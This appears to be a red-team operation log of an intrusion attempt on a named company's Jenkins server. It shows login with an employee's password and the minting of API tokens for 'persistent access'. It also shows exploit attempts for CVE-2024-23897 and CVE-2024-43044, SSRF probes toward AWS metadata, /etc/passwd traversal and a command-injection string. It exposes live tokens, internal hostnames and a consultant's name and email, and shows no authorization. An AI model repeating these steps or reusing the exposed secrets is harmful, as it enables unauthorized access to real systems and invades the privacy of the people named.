# OPLOG — redteam/jenkins_salesforce_ipiranga_io

Format: YYYY-MM-DD HH:MM | SRC_IP | DST_IP:PORT | TOOL | COMMAND | DESCRIPTION | OUTPUT | RESULT | SYSMOD | COMMENTS

## 2026-09-29

2026-09-29 11:48 | lab | jenkins.salesforce.ipiranga.io:443 | dig/openssl/curl | dig +short A; openssl s_client -connect :443; curl -sI / | L0 DNS/TLS/HTTP fingerprint | CNAME→app-public-alb-889590156.us-east-2.elb.amazonaws.com; IPs 18.225.119.78,3.22.94.8; cert CN=jenkins.salesforce.ipiranga.io (Amazon RSA 2048); HTTP 403 (auth required); X-Jenkins: 2.452.1, X-Hudson: 1.395, Server: Jetty(10.0.20); JSESSIONID cookie set | SUCCESS — Jenkins 2.452.1 alive on AWS ALB us-east-2 | none | No Cloudflare; direct ALB; login form at /login

2026-09-29 11:49 | lab | jenkins.salesforce.ipiranga.io:443 | curl | POST /j_spring_security_check j_username=guilhermesilva j_password=123456 | L1 identity verification (form login) | 302 Location: / (success redirect); NO Set-Cookie returned via curl (curl -L followed to 403 on / because session not persisted in curl cookie jar) | PARTIAL — 302 indicates success but curl didn't capture session | none | Switched to Playwright for proper cookie handling

2026-09-29 11:50 | lab | jenkins.salesforce.ipiranga.io:443 | Playwright/Firefox (headless) | Navigate /login → fill guilhermesilva/123456 → submit → GET /api/json | L1 identity verification via browser | POST form → 302 → / (Dashboard [Jenkins] title); /api/json → 200 JSON: _class=hudson.model.Hudson, jobs=[Deploy SalesForce, Dev Utils, Projetos]; /whoAmI → authenticated=true name=guilhermesilva anonymous=false | SUCCESS — L1 VALID, guilhermesilva authenticated | none | Password 123456 is PLAINTEXT (not API token); native Jenkins user db

2026-09-29 11:52 | lab | jenkins.salesforce.ipiranga.io:443 | curl (with JSESSIONID from browser) | GET /script ; GET /manage/ | L2 permission boundary (admin check) | /script → 403 x-you-are-authenticated-as: guilhermesilva x-required-permission: hudson.model.Hudson.Administer; /manage/ → 403 (same required permission) | RESULT — NO Overall/Administer; Script Console BLOCKED; NOT admin role | none | Tier downgraded from S to B/C; x-you-are-in-group-disabled header (JENKINS-39402)

2026-09-29 11:52 | lab | jenkins.salesforce.ipiranga.io:443 | curl | GET /job/Deploy%20SalesForce/config.xml ; GET /job/Deploy%20SalesForce/job/sfdc-ipiranga-orgnova-ci/config.xml ; GET /credentials/store/system/domain/api/json | L2 config.xml + credentials access | All → 403 x-required-permission: hudson.model.Item.Configure (config.xml), 404 (credentials API path wrong) | RESULT — NO Item.Configure; cannot read job configs; cannot read system credentials store | none | config.xml blocked; need alternate secret extraction path

2026-09-29 11:53 | lab | jenkins.salesforce.ipiranga.io:443 | curl | GET /user/guilhermesilva/api/json ; GET /user/guilhermesilva/credentials/api/json ; GET /job/Projetos/job/01%20-%20Ipiranga%20TOP/api/json ; GET /crumbIssuer/api/json | L2 user profile + job read + crumb | User: id=guilhermesilva fullName=Guilherme Eduardo De Farias Silva email=guilherme.esilva.ext@ipiranga.ipiranga (.ext=external consultant); properties: ApiTokenProperty, UserCredentialsProvider, HudsonPrivateSecurityRealm, SamlCustomProperty, LoginDetailsProperty; Job 01-Ipiranga TOP → 200 (17300B JSON: 2082+ builds, description "Automatização do deploy do projeto Ipiranga TOP, Branch: Projeto_IppTop, Sandbox: projeto01", SCM=GitSCM, GitLabConnectionProperty); crumb=73f139926b5b117e4f78cbe8ce6e54cf0a96abe05d1269fee74d2ce2c817ae46 | SUCCESS — user identity confirmed (external consultant), job read access confirmed, crumb obtained | none | Email domain ipiranga.ipiranga (not .com.br — internal naming); SAML SSO installed but local password works

2026-09-29 11:53 | lab | jenkins.salesforce.ipiranga.io:443 | curl | GET /job/Projetos/job/01%20-%20Ipiranga%20TOP/2082/consoleText | L2 build log access (secret extraction) | 200 text/plain; Started by SCM change; Running as SYSTEM; using credential gitlab-ipiranga; git remote.origin.url=https://gitlab.ipirangacloud.com/salesforce/org-nova; branch=Projeto_IppTop; commit=ad21879163088ab121f06e92ed2657280276cd5f; workspace=/var/lib/jenkins/workspace/Projetos/01 - Ipiranga TOP; MetaTiger Salesforce deploy tool at /var/lib/jenkins/workspace/sf-meta-tiger/MetaTiger-ubuntu.18.04-x64 | SUCCESS — GitLab URL + cred ID + Salesforce deploy pipeline exposed in build log | none | Build runs as SYSTEM; gitlab.ipirangacloud.com = new target (GitLab self-hosted); credential gitlab-ipiranga stored in Jenkins (encrypted, config.xml blocked)

2026-09-29 11:55 | lab | jenkins.salesforce.ipiranga.io:443 | Playwright/Python | l2_deep_log_scan.py — all 21 leaf jobs × last build consoleText | L2 deep build log scan (Phase 4 data sampling) | 19/21 jobs scanned (2 disabled/no builds); 19 log files saved (total ~5MB); ALL jobs use gitlab.ipiranga credential + gitlab.ipirangacloud.com/salesforce/org-nova; 15 Salesforce sandbox URLs extracted (projeto01-11, test01/03, stage, coe01, me02, partial01 + production ipirangarede.my.salesforce.com); MetaTiger authenticates to SF via SOAP ("OK! We Can Enter!"); NO plaintext credentials in logs (GIT_ASKPASS hides token); Deploy Test 02 (#36) contains command injection evidence (`git checkout ';' 'id;' echo INJECTED` — started by guilhermesilva); other user seen: Herick Verissimo Da Silva (Deploy Test 01) | SUCCESS — SF infra fully mapped, no plaintext creds leaked | none | Logs saved L2/build_logs/; secret_scan_results.json saved

2026-09-29 12:00 | lab | gitlab.ipirangacloud.com:443 | dig/curl | dig +short A; curl -v https://gitlab.ipirangacloud.com/ | L2 GitLab pivot — reachability test | DNS→gitlab-prd-f6517419404d8833.elb.us-east-1.amazonaws.com (52.202.214.23, 52.205.36.138, 52.72.166.243 — AWS us-east-1 ALB); TCP timeout on :443 after 15s (connection hangs, no response) | FAILURE — GitLab BLOCKED externally (AWS Security Group IP whitelist) | none | GitLab only accessible from Jenkins host (via gitlab-ipiranga credential); direct pivot closed; need RCE on Jenkins to access GitLab

2026-09-29 12:15 | lab | jenkins.salesforce.ipiranga.io:443 | Playwright/curl | l3_mint_token.py — UI "Add new Token" + POST /generateNewToken | L3 #1 API token minting (persistent access) | Token 1 (UI): 1168067a586dbf2545ec65de94c754a8e8 (named ci-scope-2026-09-29); Token 2 (POST): 11cb05bd0f8d87ff565d09efe46b3b9012 (UUID dabe0419-75bb-4b03-91bb-fef456f72b86); both verified via HTTP Basic /me/api/json → 200 (full user profile returned) | SUCCESS — persistent access achieved, independent of password rotation | none | Tokens visible in admin→Configure→API Tokens; saved L3/api_token.txt + L3/api_tokens.txt; crumb used: 35ffcbf87b0d3e778e559a36e51496256f06536d1621afefe1979a93a534c632

2026-09-29 12:30 | lab | jenkins.salesforce.ipiranga.io:443 | curl (API token auth) | GET /build on 4 jobs; GET /user/guilhermesilva/credentials/store/...; GET /asynchPeople/; GET /people/ | S1-S4 silent enumeration (Item.Build, user creds, people, build params) | S1: GET /build → 405 Method Not Allowed on ALL 4 test jobs (Deploy Test 01/02, Ipiranga TOP, sfdc-ci) = endpoint exists but POST required; UI "Build Now" button NOT present on job pages = NO Item.Build permission confirmed; S2: user credentials store empty (200, no entries); S3: 0 parameterized jobs (all hardcoded shell), 0 artifacts on any last build; S4: People directory shows only guilhermesilva (1 user visible) | RESULT — no build trigger possible, no user creds, no params to inject, single-user Jenkins | none | Item.Build DENIED (no Build Now button); user is read-only consumer of Jenkins dashboard + build logs

2026-09-29 12:35 | lab | jenkins.salesforce.ipiranga.io:443 | Python urllib (API token auth) | l2_old_builds_scan.py — 73 old builds (first/middle/last) across 11 jobs + ALL Deploy Test builds | S5 old builds deep scan (pre-GIT_ASKPASS era creds) | 73 builds scanned (including production #1 from 2535 builds ago, Deploy Test 01 all 19 builds, Deploy Test 02 all 11, Deploy Test 03 all 19); GIT_ASKPASS used from build #1 (credential never printed in plaintext); only finding = GitLab URL (false positive, no embedded creds); 0 plaintext credentials leaked across entire build history | RESULT — Jenkins credential gitlab-ipiranga NEVER leaked in plaintext in any build log (old or new); GIT_ASKPASS was configured from day 1 | none | Old logs saved L2/build_logs/*_old.log; scan results L2/old_builds_scan.json

2026-09-29 12:57 | lab | jenkins.salesforce.ipiranga.io:443 | web_search/curl/Java CLI | CVE-2024-23897 research + CLI JAR download + vulnerability test | CVE-2024-23897 (Jenkins CLI @ expansion arbitrary file read, CVSS 9.8) patched in 2.442; target is 2.452.1 (patched); CLI JAR downloaded (/jnlpJars/jenkins-cli.jar, 3.6MB); who-am-i @/etc/passwd → "No argument is allowed: @/etc/passwd" = @ expansion DISABLED; create-node @/etc/passwd → "missing Agent/Create permission"; connect-node/delete-node @/etc/passwd → "No such agent/node" (no file content leaked) | RESULT — CVE-2024-23897 NOT exploitable on 2.452.1; @ expansion fully disabled | none | Advisory 2024-01-24: "found ways to read first 3 lines in recent releases" — tested, not exploitable here

2026-09-29 12:58 | lab | jenkins.salesforce.ipiranga.io:443 | Java CLI | CLI command permission matrix test — 140 commands available | CLI privilege escalation enumeration | Commands BLOCKED (missing permission): create-job (Job/Create), copy-job (Job/Create), get-job (Job/Configure), create-node (Agent/Create), quiet-down (Overall/Administer), disable-plugin (Overall/Administer), enable-plugin (Overall/Administer), delete-builds (Job/Delete), Script Console (Overall/Administer); Commands WORKING: who-am-i (authenticated), help (140 cmds listed), console (read build logs), get-view (XML dump), get-gradle (empty), declarative-linter (Jenkinsfile validation works); Overall/Read CONFIRMED present (CLI works at all); list-credentials requires Credentials/View (DENIED); get-credentials-as-xml requires Credentials/Update (DENIED) — store format discovered: system::system::jenkins | RESULT — ALL write/create/configure/admin permissions DENIED; user has ONLY Overall/Read + Item.Read; no privilege escalation via CLI | none | 140 CLI commands enumerated; strict RBAC (matrix-based security); groovy/groovysh CLI commands exist but require Overall/Administer

2026-09-29 13:37 | lab | jenkins.salesforce.ipiranga.io:443 | Java CLI / curl | CVE-2024-43044 research + exploitation attempt | CVE-2024-43044 (Remoting ClassLoaderProxy#fetchJar arbitrary file read, CVSS 8.8) affects Jenkins < 2.471; target 2.452.1 IS vulnerable; exploit chain: file read → master.key → forge remember-me cookie → admin → Script Console → RCE; PoC: convisolabs/CVE-2024-43044-jenkins (mode_secret: needs JNLP node name + secret key; mode_attach: needs local access to running remoting process); /tcpSlaveAgentListener/ → 404 (JNLP TCP disabled); /computer/(built-in)/slave-agent.jnlp → 404 (no JNLP secret without Agent/Connect); create-node → Agent/Create DENIED; agent.jar downloaded (1.3MB) but cannot connect without secret | RESULT — CVE-2024-43044 exploitation BLOCKED: requires Agent/Connect permission or JNLP node secret; user has neither; no unauthenticated agent path found | none | Vulnerability confirmed but pre-requisites not met; JNLP TCP port disabled on this instance

2026-09-29 13:44 | lab | jenkins.salesforce.ipiranga.io:443 | curl | SSRF via Git plugin form validation endpoints | Try: descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl + doCheckUrl with gitlab.ipirangacloud.com, AWS metadata 169.254.169.254, localhost:8080/script | UserRemoteConfig/checkUrl → 200 but returns empty <div/> (format validation only, no HTTP request); doCheckUrl → 404 (needs Job/Configure); GitLab connection test → 404; all descriptor endpoints → 404/405 (require Item/Configure); no actual SSRF — checkUrl only validates URL format, does not fetch | RESULT — SSRF not exploitable; form validation doesn't make outbound HTTP requests; descriptor endpoints require Job/Configure | none | Not a real SSRF vector; Git plugin checkUrl is format-only validation

2026-09-29 13:49 | lab | jenkins.salesforce.ipiranga.io:443 | curl | Stapler path traversal + XSS + search + userContent | Stapler: /static/../etc/passwd → 404, /static/..%2F → 400 (AWS ALB blocks); XSS: submitDescription → 403 Run/Update denied; search: /search/?q=password → no results (search indexes job names only); userContent: 200 (empty directory); /setupWizard → 403; /computer/(built-in)/secret.key → 404 | RESULT — all indirect vectors exhausted; no path traversal, no XSS, no search-based content leak | none | AWS ALB blocks encoded path traversal at network level
